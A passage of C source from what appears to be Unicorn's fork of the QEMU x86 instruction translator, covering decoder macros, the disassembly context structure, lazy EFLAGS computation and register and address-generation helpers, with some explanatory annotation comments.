*/ #define CASE_MODRM_MEM_OP(OP) \ case (0 << 6) | (OP << 3) | 0: \ case (0 << 6) | (OP << 3) | 1: \ case (0 << 6) | (OP << 3) | 2: \ case (0 << 6) | (OP << 3) | 3: \ case (0 << 6) | (OP << 3) | 4: \ case (0 << 6) | (OP << 3) | 5: \ case (0 << 6) | (OP << 3) | 6: \ case (0 << 6) | (OP << 3) | 7: \ case (1 << 6) | (OP << 3) | 0: \ case (1 << 6) | (OP << 3) | 1: \ case (1 << 6) | (OP << 3) | 2: \ case (1 << 6) | (OP << 3) | 3: \ case (1 << 6) | (OP << 3) | 4: \ case (1 << 6) | (OP << 3) | 5: \ case (1 << 6) | (OP << 3) | 6: \ case (1 << 6) | (OP << 3) | 7: \ case (2 << 6) | (OP << 3) | 0: \ case (2 << 6) | (OP << 3) | 1: \ case (2 << 6) | (OP << 3) | 2: \ case (2 << 6) | (OP << 3) | 3: \ case (2 << 6) | (OP << 3) | 4: \ case (2 << 6) | (OP << 3) | 5: \ case (2 << 6) | (OP << 3) | 6: \ case (2 << 6) | (OP << 3) | 7 #define CASE_MODRM_OP(OP) \ case (0 << 6) | (OP << 3) | 0: \ case (0 << 6) | (OP << 3) | 1: \ case (0 << 6) | (OP << 3) | 2: \ case (0 << 6) | (OP << 3) | 3: \ case (0 << 6) | (OP << 3) | 4: \ case (0 << 6) | (OP << 3) | 5: \ case (0 << 6) | (OP << 3) | 6: \ case (0 << 6) | (OP << 3) | 7: \ case (1 << 6) | (OP << 3) | 0: \ case (1 << 6) | (OP << 3) | 1: \ case (1 << 6) | (OP << 3) | 2: \ case (1 << 6) | (OP << 3) | 3: \ case (1 << 6) | (OP << 3) | 4: \ case (1 << 6) | (OP << 3) | 5: \ case (1 << 6) | (OP << 3) | 6: \ case (1 << 6) | (OP << 3) | 7: \ case (2 << 6) | (OP << 3) | 0: \ case (2 << 6) | (OP << 3) | 1: \ case (2 << 6) | (OP << 3) | 2: \ case (2 << 6) | (OP << 3) | 3: \ case (2 << 6) | (OP << 3) | 4: \ case (2 << 6) | (OP << 3) | 5: \ case (2 << 6) | (OP << 3) | 6: \ case (2 << 6) | (OP << 3) | 7: \ case (3 << 6) | (OP << 3) | 0: \ case (3 << 6) | (OP << 3) | 1: \ case (3 << 6) | (OP << 3) | 2: \ case (3 << 6) | (OP << 3) | 3: \ case (3 << 6) | (OP << 3) | 4: \ case (3 << 6) | (OP << 3) | 5: \ case (3 << 6) | (OP << 3) | 6: \ case (3 << 6) | (OP << 3) | 7 #include "exec/gen-icount.h" typedef struct DisasContext { DisasContextBase base; /* current insn context */ int override; /* -1 if no override */ int prefix; MemOp aflag; MemOp dflag; target_ulong pc_start; target_ulong pc; /* pc = eip + cs_base */ /* current block context */ target_ulong cs_base; /* base of CS segment */ int pe; /* protected mode */ int code32; /* 32 bit code segment */ #ifdef TARGET_X86_64 int lma; /* long mode active */ int code64; /* 64 bit code segment */ int rex_x, rex_b; #endif int vex_l; /* vex vector length */ int vex_v; /* vex vvvv register, without 1's complement. */ int ss32; /* 32 bit stack segment */ CCOp cc_op; /* current CC operation */ CCOp last_cc_op; /* Unicorn: last CC operation. 
Save this to see if cc_op has changed */ bool cc_op_dirty; #ifdef TARGET_X86_64 bool x86_64_hregs; #endif int addseg; /* non zero if either DS/ES/SS have a non zero base */ int f_st; /* currently unused */ int vm86; /* vm86 mode */ int cpl; int iopl; int tf; /* TF cpu flag */ int jmp_opt; /* use direct block chaining for direct jumps */ int repz_opt; /* optimize jumps within repz instructions */ int mem_index; /* select memory access functions */ uint64_t flags; /* all execution flags */ int popl_esp_hack; /* for correct popl with esp base handling */ int rip_offset; /* only used in x86_64, but left for simplicity */ int cpuid_features; int cpuid_ext_features; int cpuid_ext2_features; int cpuid_ext3_features; int cpuid_7_0_ebx_features; int cpuid_xsave_features; /* TCG local temps */ TCGv cc_srcT; TCGv A0; TCGv T0; TCGv T1; /* TCG local register indexes (only used inside old micro ops) */ TCGv tmp0; TCGv tmp4; TCGv_ptr ptr0; TCGv_ptr ptr1; TCGv_i32 tmp2_i32; TCGv_i32 tmp3_i32; TCGv_i64 tmp1_i64; sigjmp_buf jmpbuf; // Unicorn struct uc_struct *uc; target_ulong prev_pc; /* save address of the previous instruction */ } DisasContext; static void gen_eob(DisasContext *s); static void gen_jr(DisasContext *s, TCGv dest); static void gen_jmp(DisasContext *s, target_ulong eip); static void gen_jmp_tb(DisasContext *s, target_ulong eip, int tb_num); static void gen_op(DisasContext *s, int op, MemOp ot, int d); /* i386 arith/logic operations */ enum { OP_ADDL, OP_ORL, OP_ADCL, OP_SBBL, OP_ANDL, OP_SUBL, OP_XORL, OP_CMPL, }; /* i386 shift ops */ enum { OP_ROL, OP_ROR, OP_RCL, OP_RCR, OP_SHL, OP_SHR, OP_SHL1, /* undocumented */ OP_SAR = 7, }; enum { JCC_O, JCC_B, JCC_Z, JCC_BE, JCC_S, JCC_P, JCC_L, JCC_LE, }; enum { /* I386 int registers */ OR_EAX, /* MUST be even numbered */ OR_ECX, OR_EDX, OR_EBX, OR_ESP, OR_EBP, OR_ESI, OR_EDI, OR_TMP0 = 16, /* temporary operand register */ OR_TMP1, OR_A0, /* temporary register used when doing address evaluation */ }; enum { USES_CC_DST = 1, USES_CC_SRC = 2, USES_CC_SRC2 = 4, USES_CC_SRCT = 8, }; /* Bit set if the global variable is live after setting CC_OP to X. 
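   Annotation (not in the original source): this table drives the lazy
   flags scheme -- e.g. after CC_OP_ADDB, cc_dst holds the 8-bit result
   and cc_src the addend, so the carry can later be recovered as
   (uint8_t)cc_dst < (uint8_t)cc_src without ever materializing EFLAGS.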
*/ static const uint8_t cc_op_live[CC_OP_NB] = { [CC_OP_DYNAMIC] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_EFLAGS] = USES_CC_SRC, [CC_OP_MULB] = USES_CC_DST | USES_CC_SRC, [CC_OP_MULW] = USES_CC_DST | USES_CC_SRC, [CC_OP_MULL] = USES_CC_DST | USES_CC_SRC, [CC_OP_MULQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDB] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDW] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDL] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADDQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADCB] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCW] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCL] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SUBB] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SUBW] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SUBL] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SUBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRCT, [CC_OP_SBBB] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SBBW] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SBBL] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_SBBQ] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_LOGICB] = USES_CC_DST, [CC_OP_LOGICW] = USES_CC_DST, [CC_OP_LOGICL] = USES_CC_DST, [CC_OP_LOGICQ] = USES_CC_DST, [CC_OP_INCB] = USES_CC_DST | USES_CC_SRC, [CC_OP_INCW] = USES_CC_DST | USES_CC_SRC, [CC_OP_INCL] = USES_CC_DST | USES_CC_SRC, [CC_OP_INCQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECB] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECW] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECL] = USES_CC_DST | USES_CC_SRC, [CC_OP_DECQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLB] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLW] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLL] = USES_CC_DST | USES_CC_SRC, [CC_OP_SHLQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARB] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARW] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARL] = USES_CC_DST | USES_CC_SRC, [CC_OP_SARQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGB] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGW] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGL] = USES_CC_DST | USES_CC_SRC, [CC_OP_BMILGQ] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADCX] = USES_CC_DST | USES_CC_SRC, [CC_OP_ADOX] = USES_CC_SRC | USES_CC_SRC2, [CC_OP_ADCOX] = USES_CC_DST | USES_CC_SRC | USES_CC_SRC2, [CC_OP_CLR] = 0, [CC_OP_POPCNT] = USES_CC_SRC, }; static inline void gen_jmp_im(DisasContext *s, target_ulong pc); static void set_cc_op(DisasContext *s, CCOp op) { int dead; TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; TCGv cpu_cc_dst = tcg_ctx->cpu_cc_dst; TCGv cpu_cc_src = tcg_ctx->cpu_cc_src; TCGv cpu_cc_src2 = tcg_ctx->cpu_cc_src2; if (s->cc_op == op) { return; } /* Discard CC computation that will no longer be used. */ dead = cc_op_live[s->cc_op] & ~cc_op_live[op]; if (dead & USES_CC_DST) { tcg_gen_discard_tl(tcg_ctx, cpu_cc_dst); } if (dead & USES_CC_SRC) { tcg_gen_discard_tl(tcg_ctx, cpu_cc_src); } if (dead & USES_CC_SRC2) { tcg_gen_discard_tl(tcg_ctx, cpu_cc_src2); } if (dead & USES_CC_SRCT) { tcg_gen_discard_tl(tcg_ctx, s->cc_srcT); } if (op == CC_OP_DYNAMIC) { /* The DYNAMIC setting is translator only, and should never be stored. Thus we always consider it clean. */ s->cc_op_dirty = false; } else { /* Discard any computed CC_OP value (see shifts). 
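       Annotation (not in the original source): variable-count shifts
       store cc_op at run time (see gen_shift_flags), so the stale value
       left in the global must be discarded once the translator switches
       back to a statically known operation.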
*/ if (s->cc_op == CC_OP_DYNAMIC) { tcg_gen_discard_i32(tcg_ctx, cpu_cc_op); } s->cc_op_dirty = true; } s->cc_op = op; } static void gen_update_cc_op(DisasContext *s) { if (s->cc_op_dirty) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; tcg_gen_movi_i32(tcg_ctx, cpu_cc_op, s->cc_op); s->cc_op_dirty = false; } } #ifdef TARGET_X86_64 #define NB_OP_SIZES 4 #else /* !TARGET_X86_64 */ #define NB_OP_SIZES 3 #endif /* !TARGET_X86_64 */ #if defined(HOST_WORDS_BIGENDIAN) #define REG_B_OFFSET (sizeof(target_ulong) - 1) #define REG_H_OFFSET (sizeof(target_ulong) - 2) #define REG_W_OFFSET (sizeof(target_ulong) - 2) #define REG_L_OFFSET (sizeof(target_ulong) - 4) #define REG_LH_OFFSET (sizeof(target_ulong) - 8) #else #define REG_B_OFFSET 0 #define REG_H_OFFSET 1 #define REG_W_OFFSET 0 #define REG_L_OFFSET 0 #define REG_LH_OFFSET 4 #endif /* In instruction encodings for byte register accesses the * register number usually indicates "low 8 bits of register N"; * however there are some special cases where N 4..7 indicates * [AH, CH, DH, BH], ie "bits 15..8 of register N-4". Return * true for this special case, false otherwise. */ static inline bool byte_reg_is_xH(DisasContext *s, int reg) { if (reg < 4) { return false; } #ifdef TARGET_X86_64 if (reg >= 8 || s->x86_64_hregs) { return false; } #endif return true; } /* Select the size of a push/pop operation. */ static inline MemOp mo_pushpop(DisasContext *s, MemOp ot) { if (CODE64(s)) { return ot == MO_16 ? MO_16 : MO_64; } else { return ot; } } /* Select the size of the stack pointer. */ static inline MemOp mo_stacksize(DisasContext *s) { return CODE64(s) ? MO_64 : s->ss32 ? MO_32 : MO_16; } /* Select only size 64 else 32. Used for SSE operand sizes. */ static inline MemOp mo_64_32(MemOp ot) { #ifdef TARGET_X86_64 return ot == MO_64 ? MO_64 : MO_32; #else return MO_32; #endif } /* Select size 8 if lsb of B is clear, else OT. Used for decoding byte vs word opcodes. */ static inline MemOp mo_b_d(int b, MemOp ot) { return b & 1 ? ot : MO_8; } /* Select size 8 if lsb of B is clear, else OT capped at 32. Used for decoding operand size of port opcodes. */ static inline MemOp mo_b_d32(int b, MemOp ot) { return b & 1 ? (ot == MO_16 ? MO_16 : MO_32) : MO_8; } static void gen_op_mov_reg_v(DisasContext *s, MemOp ot, int reg, TCGv t0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch(ot) { case MO_8: if (!byte_reg_is_xH(s, reg)) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], tcg_ctx->cpu_regs[reg], t0, 0, 8); } else { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_regs[reg - 4], tcg_ctx->cpu_regs[reg - 4], t0, 8, 8); } break; case MO_16: tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], tcg_ctx->cpu_regs[reg], t0, 0, 16); break; case MO_32: /* For x86_64, this sets the higher half of register to zero. For i386, this is equivalent to a mov. 
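           Annotation (not in the original source): e.g. "mov eax, 1" in
           long mode leaves RAX == 1 with bits 63:32 cleared, which is
           why a zero extension rather than a deposit is generated here.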
*/ tcg_gen_ext32u_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], t0); break; #ifdef TARGET_X86_64 case MO_64: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], t0); break; #endif default: tcg_abort(); } } static inline void gen_op_mov_v_reg(DisasContext *s, MemOp ot, TCGv t0, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (ot == MO_8 && byte_reg_is_xH(s, reg)) { tcg_gen_extract_tl(tcg_ctx, t0, tcg_ctx->cpu_regs[reg - 4], 8, 8); } else { tcg_gen_mov_tl(tcg_ctx, t0, tcg_ctx->cpu_regs[reg]); } } static void gen_add_A0_im(DisasContext *s, int val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, s->A0, s->A0, val); if (!CODE64(s)) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, s->A0); } } static inline void gen_op_jmp_v(TCGContext *tcg_ctx, TCGv dest) { tcg_gen_st_tl(tcg_ctx, dest, tcg_ctx->cpu_env, offsetof(CPUX86State, eip)); } static inline void gen_op_add_reg_im(DisasContext *s, MemOp size, int reg, int32_t val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[reg], val); gen_op_mov_reg_v(s, size, reg, s->tmp0); } static inline void gen_op_add_reg_T0(DisasContext *s, MemOp size, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_add_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[reg], s->T0); gen_op_mov_reg_v(s, size, reg, s->tmp0); } static inline void gen_sync_pc(TCGContext *ctx, uint64_t pc) { TCGv v = tcg_temp_new(ctx); tcg_gen_movi_tl(ctx, v, pc); gen_op_jmp_v(ctx, v); tcg_temp_free(ctx, v); } static inline void gen_op_ld_v(DisasContext *s, int idx, TCGv t0, TCGv a0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ)) gen_sync_pc(tcg_ctx, s->prev_pc); // Unicorn: sync EIP tcg_gen_qemu_ld_tl(tcg_ctx, t0, a0, s->mem_index, idx | MO_LE); } static inline void gen_op_st_v(DisasContext *s, int idx, TCGv t0, TCGv a0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE)) gen_sync_pc(tcg_ctx, s->prev_pc); // Unicorn: sync EIP tcg_gen_qemu_st_tl(tcg_ctx, t0, a0, s->mem_index, idx | MO_LE); } static inline void gen_op_st_rm_T0_A0(DisasContext *s, int idx, int d) { if (d == OR_TMP0) { gen_op_st_v(s, idx, s->T0, s->A0); } else { gen_op_mov_reg_v(s, idx, d, s->T0); } } static inline void gen_jmp_im(DisasContext *s, target_ulong pc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, s->tmp0, pc); gen_op_jmp_v(tcg_ctx, s->tmp0); } /* Compute SEG:REG into A0. SEG is selected from the override segment (OVR_SEG) and the default segment (DEF_SEG). OVR_SEG may be -1 to indicate no override. 
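   Annotation (not in the original source): e.g. "mov al, [es:bx]" with
   a 16-bit address size yields A0 = ES.base + (BX & 0xffff), truncated
   to 32 bits outside long mode.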
*/ static void gen_lea_v_seg(DisasContext *s, MemOp aflag, TCGv a0, int def_seg, int ovr_seg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (aflag) { #ifdef TARGET_X86_64 case MO_64: if (ovr_seg < 0) { tcg_gen_mov_tl(tcg_ctx, s->A0, a0); return; } break; #endif case MO_32: /* 32 bit address */ if (ovr_seg < 0 && s->addseg) { ovr_seg = def_seg; } if (ovr_seg < 0) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, a0); return; } break; case MO_16: /* 16 bit address */ tcg_gen_ext16u_tl(tcg_ctx, s->A0, a0); a0 = s->A0; if (ovr_seg < 0) { if (s->addseg) { ovr_seg = def_seg; } else { return; } } break; default: tcg_abort(); } if (ovr_seg >= 0) { TCGv seg = tcg_ctx->cpu_seg_base[ovr_seg]; if (aflag == MO_64) { tcg_gen_add_tl(tcg_ctx, s->A0, a0, seg); } else if (CODE64(s)) { tcg_gen_ext32u_tl(tcg_ctx, s->A0, a0); tcg_gen_add_tl(tcg_ctx, s->A0, s->A0, seg); } else { tcg_gen_add_tl(tcg_ctx, s->A0, a0, seg); tcg_gen_ext32u_tl(tcg_ctx, s->A0, s->A0); } } } static inline void gen_string_movl_A0_ESI(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_lea_v_seg(s, s->aflag, tcg_ctx->cpu_regs[R_ESI], R_DS, s->override); } static inline void gen_string_movl_A0_EDI(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_lea_v_seg(s, s->aflag, tcg_ctx->cpu_regs[R_EDI], R_ES, -1); } static inline void gen_op_movl_T0_Dshift(DisasContext *s, MemOp ot) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32s_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State, df)); tcg_gen_shli_tl(tcg_ctx, s->T0, s->T0, ot); }; static TCGv gen_ext_tl(TCGContext *tcg_ctx, TCGv dst, TCGv src, MemOp size, bool sign) { switch (size) { case MO_8: if (sign) { tcg_gen_ext8s_tl(tcg_ctx, dst, src); } else { tcg_gen_ext8u_tl(tcg_ctx, dst, src); } return dst; case MO_16: if (sign) { tcg_gen_ext16s_tl(tcg_ctx, dst, src); } else { tcg_gen_ext16u_tl(tcg_ctx, dst, src); } return dst; #ifdef TARGET_X86_64 case MO_32: if (sign) { tcg_gen_ext32s_tl(tcg_ctx, dst, src); } else { tcg_gen_ext32u_tl(tcg_ctx, dst, src); } return dst; #endif default: return src; } } static void gen_extu(TCGContext *tcg_ctx, MemOp ot, TCGv reg) { gen_ext_tl(tcg_ctx, reg, reg, ot, false); } static void gen_exts(TCGContext *tcg_ctx, MemOp ot, TCGv reg) { gen_ext_tl(tcg_ctx, reg, reg, ot, true); } static inline void gen_op_jnz_ecx(DisasContext *s, MemOp size, TCGLabel *label1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[R_ECX]); gen_extu(tcg_ctx, size, s->tmp0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, s->tmp0, 0, label1); } static inline void gen_op_jz_ecx(DisasContext *s, MemOp size, TCGLabel *label1) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_regs[R_ECX]); gen_extu(tcg_ctx, size, s->tmp0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, s->tmp0, 0, label1); } static void gen_helper_in_func(TCGContext *tcg_ctx, MemOp ot, TCGv v, TCGv_i32 n) { switch (ot) { case MO_8: gen_helper_inb(tcg_ctx, v, tcg_ctx->cpu_env, n); break; case MO_16: gen_helper_inw(tcg_ctx, v, tcg_ctx->cpu_env, n); break; case MO_32: gen_helper_inl(tcg_ctx, v, tcg_ctx->cpu_env, n); break; default: tcg_abort(); } } static void gen_helper_out_func(TCGContext *tcg_ctx, MemOp ot, TCGv_i32 v, TCGv_i32 n) { switch (ot) { case MO_8: gen_helper_outb(tcg_ctx, tcg_ctx->cpu_env, v, n); break; case MO_16: gen_helper_outw(tcg_ctx, tcg_ctx->cpu_env, v, n); break; case MO_32: gen_helper_outl(tcg_ctx, tcg_ctx->cpu_env, v, n); break; default: tcg_abort(); } } static void gen_check_io(DisasContext *s, MemOp ot, target_ulong cur_eip, 
uint32_t svm_flags) { // Unicorn: allow all I/O instructions return; TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong next_eip; if (s->pe && (s->cpl > s->iopl || s->vm86)) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); switch (ot) { case MO_8: gen_helper_check_iob(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case MO_16: gen_helper_check_iow(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; case MO_32: gen_helper_check_iol(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); break; default: tcg_abort(); } } if(s->flags & HF_GUEST_MASK) { gen_update_cc_op(s); gen_jmp_im(s, cur_eip); svm_flags |= (1 << (4 + ot)); next_eip = s->pc - s->cs_base; tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_svm_check_io(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, tcg_const_i32(tcg_ctx, svm_flags), tcg_const_i32(tcg_ctx, next_eip - cur_eip)); } } static inline void gen_movs(DisasContext *s, MemOp ot) { gen_string_movl_A0_ESI(s); gen_op_ld_v(s, ot, s->T0, s->A0); gen_string_movl_A0_EDI(s); gen_op_st_v(s, ot, s->T0, s->A0); gen_op_movl_T0_Dshift(s, ot); gen_op_add_reg_T0(s, s->aflag, R_ESI); gen_op_add_reg_T0(s, s->aflag, R_EDI); } static void gen_op_update1_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); } static void gen_op_update2_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); } static void gen_op_update3_cc(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, reg); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); } static inline void gen_op_testl_T0_T1_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, s->T1); } static void gen_op_update_neg_cc(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_neg_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0); tcg_gen_movi_tl(tcg_ctx, s->cc_srcT, 0); } /* compute all eflags to cc_src */ static void gen_compute_eflags(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv zero, dst, src1, src2; int live, dead; if (s->cc_op == CC_OP_EFLAGS) { return; } if (s->cc_op == CC_OP_CLR) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, CC_Z | CC_P); set_cc_op(s, CC_OP_EFLAGS); return; } zero = NULL; dst = tcg_ctx->cpu_cc_dst; src1 = tcg_ctx->cpu_cc_src; src2 = tcg_ctx->cpu_cc_src2; /* Take care to not read values that are not live. 
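       Annotation (not in the original source): globals discarded by
       set_cc_op() contain garbage, so each dead cc_dst/cc_src/cc_src2
       slot is substituted with a zero temporary before calling the
       cc_compute_all helper.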
*/ live = cc_op_live[s->cc_op] & ~USES_CC_SRCT; dead = live ^ (USES_CC_DST | USES_CC_SRC | USES_CC_SRC2); if (dead) { zero = tcg_const_tl(tcg_ctx, 0); if (dead & USES_CC_DST) { dst = zero; } if (dead & USES_CC_SRC) { src1 = zero; } if (dead & USES_CC_SRC2) { src2 = zero; } } gen_update_cc_op(s); gen_helper_cc_compute_all(tcg_ctx, tcg_ctx->cpu_cc_src, dst, src1, src2, tcg_ctx->cpu_cc_op); set_cc_op(s, CC_OP_EFLAGS); if (dead) { tcg_temp_free(tcg_ctx, zero); } } typedef struct CCPrepare { TCGCond cond; TCGv reg; TCGv reg2; target_ulong imm; target_ulong mask; bool use_reg2; bool no_setcond; } CCPrepare; /* compute eflags.C to reg */ static CCPrepare gen_prepare_eflags_c(DisasContext *s, TCGv reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv t0, t1; int size, shift; switch (s->cc_op) { case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: /* (DATA_TYPE)CC_SRCT < (DATA_TYPE)CC_SRC */ size = s->cc_op - CC_OP_SUBB; t1 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, false); /* If no temporary was used, be careful not to alias t1 and t0. */ t0 = t1 == tcg_ctx->cpu_cc_src ? s->tmp0 : reg; tcg_gen_mov_tl(tcg_ctx, t0, s->cc_srcT); gen_extu(tcg_ctx, size, t0); goto add_sub; case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: /* (DATA_TYPE)CC_DST < (DATA_TYPE)CC_SRC */ size = s->cc_op - CC_OP_ADDB; t1 = gen_ext_tl(tcg_ctx, s->tmp0, tcg_ctx->cpu_cc_src, size, false); t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_dst, size, false); add_sub: return (CCPrepare) { .cond = TCG_COND_LTU, .reg = t0, .reg2 = t1, .mask = -1, .use_reg2 = true }; case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: case CC_OP_CLR: case CC_OP_POPCNT: return (CCPrepare) { .cond = TCG_COND_NEVER, .mask = -1 }; case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = -1, .no_setcond = true }; case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: /* (CC_SRC >> (DATA_BITS - 1)) & 1 */ size = s->cc_op - CC_OP_SHLB; shift = (8 << size) - 1; return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = (target_ulong)1 << shift }; case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = -1 }; case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: size = s->cc_op - CC_OP_BMILGB; t0 = gen_ext_tl(tcg_ctx, reg, tcg_ctx->cpu_cc_src, size, false); return (CCPrepare) { .cond = TCG_COND_EQ, .reg = t0, .mask = -1 }; case CC_OP_ADCX: case CC_OP_ADCOX: return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_dst, .mask = -1, .no_setcond = true }; case CC_OP_EFLAGS: case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: /* CC_SRC & 1 */ return (CCPrepare) { .cond = TCG_COND_NE, .reg = tcg_ctx->cpu_cc_src, .mask = CC_C }; default: /* The need to compute only C from CC_OP_DYNAMIC is important in efficiently implementing e.g. INC at the start of a TB. 
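       Annotation (not in the original source): INC/DEC update every
       arithmetic flag except CF, so only the incoming carry has to be
       materialized here instead of the full EFLAGS.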
